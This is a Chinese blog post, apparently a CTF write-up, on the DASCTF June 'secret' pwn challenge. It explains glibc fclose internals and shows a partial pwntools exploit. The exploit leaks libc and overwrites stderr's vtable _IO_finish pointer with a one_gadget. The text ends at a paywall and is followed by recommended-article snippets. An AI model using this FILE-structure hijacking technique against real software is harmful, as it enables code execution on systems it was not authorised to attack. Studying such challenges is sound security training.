DASCTF六月赛部分赛题复现

最新推荐文章于 2024-04-21 11:16:34 发布
最新推荐文章于 2024-04-21 11:16:34 发布
阅读量1k 收藏 1
点赞数
分类专栏: CTF复现 文章标签: DASCTF IO attack misc
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44145820/article/details/107881384
版权

目录

PWN

secret(伪造vtable)

在这里插入图片描述

这题当时比赛的时候找到了先知上的一篇文章,研究了它的代码想在本题复现,但是总是不成功
看了大佬们的博客,发现这题居然这么简单Orz

简单说一下这题的原理:
在这里插入图片描述

本题先close了stdout,然后给写两字节和0x18字节的机会,之后close stderr和stdin

那么我们先分析一下fclose的源码,其核心函数是位于/libio/iofclose.c的_IO_new_fclose函数,其大致流程是:首先检查文件结构体指针,之后使用_IO_un_link将文件结构体从_IO_list_all链表取下,_IO_file_close_it会最终调用系统调用关闭文件描述符,之后调用_IO_FINISH(fp),如果并非stdin/stdout/stderr最后调用free(fp)释放结构体指针。关于fclose等函数的详细分析可以参见IO FILE 之fclose 详解

而_IO_jump_t的结构如下:链接

struct _IO_jump_t
{
   
    JUMP_FIELD(size_t, __dummy);
    JUMP_FIELD(size_t, __dummy2);
    JUMP_FIELD(_IO_finish_t, __finish);
    JUMP_FIELD(_IO_overflow_t, __overflow);
    JUMP_FIELD(_IO_underflow_t, __underflow);
    JUMP_FIELD(_IO_underflow_t, __uflow);
    JUMP_FIELD(_IO_pbackfail_t, __pbackfail);
    /* showmany */
    JUMP_FIELD(_IO_xsputn_t, __xsputn);
    JUMP_FIELD(_IO_xsgetn_t, __xsgetn);
    JUMP_FIELD(_IO_seekoff_t, __seekoff);
    JUMP_FIELD(_IO_seekpos_t, __seekpos);
    JUMP_FIELD(_IO_setbuf_t, __setbuf);
    JUMP_FIELD(_IO_sync_t, __sync);
    JUMP_FIELD(_IO_doallocate_t, __doallocate);
    JUMP_FIELD(_IO_read_t, __read);
    JUMP_FIELD(_IO_write_t, __write);
    JUMP_FIELD(_IO_seek_t, __seek);
    JUMP_FIELD(_IO_close_t, __close);
    JUMP_FIELD(_IO_stat_t, __stat);
    JUMP_FIELD(_IO_showmanyc_t, __showmanyc);
    JUMP_FIELD(_IO_imbue_t, __imbue);
};

因为我们只有0x18的写长度,因此只能写到_IO_finish。在这里我们用不到2字节的写,我们只需要把stderr的vtable中_IO_finish的地址改成one_gadget即可

from pwn import *

#r = remote("183.129.189.60", 10030)
r = remote("127.0.0.1", 10001)
#r = process("./secret3")
context.log_level = 'debug'
DEBUG = 0
if DEBUG:
	gdb.attach(r, 
	'''
	b *$rebase(0x1255)
	
	''')

libc = ELF("./libc/libc-2.29.so")
one_gadget_19 = [0xe237f, 0xe2383, 0xe2386, 0x106ef8]

r.recvuntil("I give you a secret:")
printf = int(r.recvuntil('\n').strip(), 16)
success("printf:"+hex(printf))

libc.address = printf - libc.sym['printf']
libc_base = libc.address
success("libc:"+hex(libc_base))
stdin = libc.sym['_IO_2_1_stdin_']
stdout = libc.sym['_IO_2_1_stdout_']
stderr
最低0.47元/天 解锁文章
L.o.W
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DASCTF 6月部分pwn wp
starssgo的博客
06-27 1094
感觉质量挺高的,有点昏迷, 目录Memory-Monster-IVoooooordereasyheapspringboardsecret写在最后 Memory-Monster-IV 这个题我是真的服了,恶心了我一天时间,最后还是没出,知道是要改got表,而且每次只能改一个字节,第一次改后变成ret之类的无用函数,我是不想说啥,没复现出来,贴下作者的分析把: http://taqini.space/2020/06/26/DASCTF-June-Memory-Monster-IV-200pt/ 我感觉能学到的东
六月DASCTFre方面wp
weixin_43990313的博客
06-28 381
T0p Gear 题目是upx壳,先用upx脱壳后载入ida。 观察程序的逻辑。有三个关键check,分别进入观察逻辑。 check1(其中sub_401080是相等的比较函数)这段flag的结果就是字符串(注意字符串的顺序) 其实看汇编代码更直接一些。 check2,这是一个aes加密,对字符串进行加密然后和输入的数据进行比较。 可以直接在call这一位置下断,观察rax寄存器的情况。gdb调试下断即可。 查看rax寄存器的内容,得到字符串。 check3同理 拼接起来得到fag c92bb
2022MathorCup高校数学建模挑战赛题
07-28
2022MathorCup高校数学建模挑战赛题
DASCTF X GFCTF 2024|四月开启第一局
最新发布
qq_61670993的博客
04-21 889
简单题
2020年DASCTF六月团队 REVERSE Magia
hhcjl的博客
06-30 719
2020年DASCTF六月团队 REVERSE Magia2020年DASCTF六月团队 REVERSE MagiaIDA静态分析字符串输入检测字符间逻辑检测继续IDA分析利用XDBG进行动态分析 2020年DASCTF六月团队 REVERSE Magia IDA静态分析 程序为32位Windows程序,拖入IDA3Pro分析 字符串输入检测 输入字符串后进入sub_403290()函数检测,满足以下条件: 1.字符串必须为32位。 2、第1、2、3、4、32位分别为‘N’、‘e’、‘p’、
安恒DASCTF六月团队挑战 Keyboard
Bok_choy的博客
07-14 1043
文件解压后得到这两个文件,raw文件是镜像文件,根据之前做题的经验,secret是内存取证 于是放进虚拟机使用volatility提取文件: 查看镜像版本 直接定向检索txt文件 将其dump下来 此时文件夹中多了一个以dat为后缀的文件 然后用strings查看内容: 显然我们得到了ctf关键信息 解密方式按照键盘字母解密 且提示密码是大写,解密得到 VERACRYPTPASSWORDISKEYBOARDDRAOBYEK 参考文献:https://ct...
安恒六月DASCTF(web1,2)
weixin_43610673的博客
06-26 1615
简单的计算题-1 #!/usr/bin/env python3 # -*- coding: utf-8 -*- from flask import Flask, render_template, request,session from config import black_list,create import os app = Flask(__name__) app.config['SECRET_KEY'] = os.urandom(24) ## flag is in /flag try to ge
CSP-J模拟真题复现
08-02
【CSP-J模拟真题复现】 CSP-J(中国计算机学会青少年软件编程能力认证初级)是一项针对青少年的编程能力评估考试,旨在检验考生的编程基础和逻辑思维能力。本模拟名为FCC - PCS-J,旨在与CSP-J保持相似的难度...
2020年首届ACM中国-国际并行计算挑战全国初赛题1
08-03
【ACM中国-国际并行计算挑战全国初赛题1】主要关注的是9-point stencil算法在图像处理中的并行优化。9-point stencil是一种基本的矩阵计算算法,主要用于图像的加权模糊处理。它从PNG图像中读取像素点信息,对非...
用于备份CTF比赛题目,仅队内复现使用.zip
08-24
全国大学生电子设计竞(National Undergraduate Electronics Design Contest),试题,解决方案及源码。计划或参加电的同学可以用来学习提升和参考。程序均是实战案例,经过测试可直接运行。...
论文复现.zip
08-24
全国大学生电子设计竞(National Undergraduate Electronics Design Contest),试题,解决方案及源码。计划或参加电的同学可以用来学习提升和参考。程序均是实战案例,经过测试可直接运行。...
DASCTF6月 pwn (oooorder secret Memory_Monster_IV springboard easyheap)
carol2358的博客
07-08 939
oooorder malloc可以从bin里取回可以保留内容, realloc size为0时会free这个chunk, 本题就有UAF漏洞了 先free然后再取回, 相同的两次操作拿到heap_base, libc_base, 然后uaf把free_hook覆盖为setcontext+53 后半部分是setcontext+orw(请自备flag文件),用在沙盒堆里, setcontext可以看这里, 计算距离rdi的偏移就行, 控制好0xa(rsp)和0xa8(rip) http://bl...
Dasctf 6月其余pwn WP
qq_31457355的博客
11-01 566
copy: 这题主要是堆风水的利用,通过运行我们可以发现,每次申请块之后都会free掉这个块,但是接下来执行删除操作的时候我们还可以利用这个指针因此存在uaf漏洞,剩下的就是堆风水的利用了,不再赘述 exp: #!/usr/bin/env python # -*- coding: utf-8 -*- import sys import os from pwn import * #from LibcSearcher import LibcSearcher # context.log_level = 'debu
DASCTF2020 7月月
qq_42158602的博客
07-25 735
bullshit 题目 from flag import flag def pairing(a,b): shell = max(a, b) step = min(a, b) if step == b: flag = 0 else: flag = 1 return shell ** 2 + step * 2 + flag def encrypt(message): res = '' for i in range(0,le
2022.3.19-2022.3.27每周刷题
yc11223344的博客
03-27 1705
[UTCTF2020]basic-forensics 将下载下来的jepg用010打开发现是一个文本,所以把后缀名改成txt 搜索flag看到 utflag{fil3_ext3nsi0ns_4r3nt_r34l}` [UTCTF2020]File Carving 下载完附件是一个图片,首先想到010打开看一下,在尾部发现一个压缩包 在kali里面binwalk一下 解压出来之后,执行file分析一下hidden_binary 发现是一个ELF文件所以我们执行命令即可得到 得到` utflag
DASCTF 八月 misc部分题目复现
wu_zh1_hui的博客
08-28 1323
1.双重图格 题目给了两章图片和一个hint的excel文件,写的时候一直以为是文件外藏了什么,发现其实是空格隐藏数据,进去之后把空格都替换掉就发现提示 得到 Insert:OFFSET28354h 意思是在28354h这个位置插入什么 把图片放到010里看一下, 有一块识别不出来的数据,结合前面的提示, 把这一块剪切下来放到提示的位置。(这里我看了半天大佬的wp没懂,问了群里的师傅才知道,谢谢好心的师傅们) 这里涉及到fdat的数据,这里是apng的文件,要用谷歌或者火狐浏览器查看才行(我的浏
安恒php_DASCTF6月
weixin_40007541的博客
12-21 273
因为和第五空间连着,然后昨天下午又去打了一场AWD,感觉身体掏空,就认真打了DASCTF(咕咕咕),剩下的题目等有机会再复现简单的计算器-1考点:python eval()代码注入,命令执行结果外带访问Source可以看到源码:#!/usr/bin/env python3# -*- coding: utf-8 -*-from flask import Flask, render_template,...
2021GKCTF X DASCTF应急挑战杯部分Writeup
克格莫
06-26 2382
1.签到 尝试了一波发现是16进制的base64编码,并且base64编码被反转了。 a = 'wIDIgACIgACIgAyIK0wIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMiCNoQD' b='jMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjoQDjACIgACIgACIggDM6EDM6AjMgAzMtMDMtEjM' c='t0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt
2021DASCTF八月挑战WP
克格莫
08-31 445
1.签到 略。 2.[crypto]easymath 参考:https://zhuanlan.zhihu.com/p/363648238 exp: s_shift = 1862790884563160582365888530869690397667546628710795031544304378154769559410473276482265448754388655981091313419549689169381115573539422545933044902527020209259938095466283
OPINIONDIGEST复现
07-27
OPINIONDIGEST复现

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值